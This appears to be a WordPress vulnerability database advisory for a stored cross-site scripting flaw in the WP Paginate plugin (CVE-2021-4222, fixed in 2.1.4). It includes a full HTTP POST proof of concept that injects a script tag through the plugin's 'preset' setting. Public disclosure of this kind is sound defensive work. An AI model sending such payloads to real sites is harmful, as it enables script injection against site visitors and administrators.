WP Paginate < 2.1.4 – Admin+ Stored Cross-Site Scripting | CVE 2021-4222 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape its preset settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed

Proof of Concept

POST /wp-admin/options-general.php?page=wp-paginate.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 385
Connection: close
Cookie: [admin Cookies]

_wpnonce=6dbb0cc5f5&title=Pages%3A&previouspage=%26laquo%3B&nextpage=%26raquo%3B&position=none&font=font-inherit&before=%3Cdiv+class%3D%22navigation%22%3E&after=%3C%2Fdiv%3E&empty=on&css=on&range=3&anchor=1&gap=3&wp_paginate_save=Save+Changes&preset='%3e%3cscript%3ealert(/XSS/)%3c%2fscript%3e

Affects Plugins

Fixed in 2.1.4

References

CVE

Exploitdb

URL

https://packetstormsecurity.com/files/#160800/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Park Won Seok

Verified

Yes

WPVDB ID

6df5f5b1-f10b-488e-80b3-2c024bbb8c78

Timeline

Publicly Published

2021-01-05 (about 4 years ago)

Added

2021-01-07 (about 4 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2014-08-01

Title

Wordfence 3.8.1 - wp-admin/admin.php whois Parameter Stored XSS

Published

2024-12-05

Title

News Kit Elementor Addons <= 1.4.1 - Contributor+ Stored XSS

Published

2024-06-03

Title

Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.78 - Reflected Cross-Site Scripting

Published

2024-07-08

Title

oik < 4.12.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via bw_button Shortcode

Published

2024-10-14

Title

Contact Form by Supsystic < 1.7.29 - Authenticated (Administrator+) Stored Cross-Site Scripting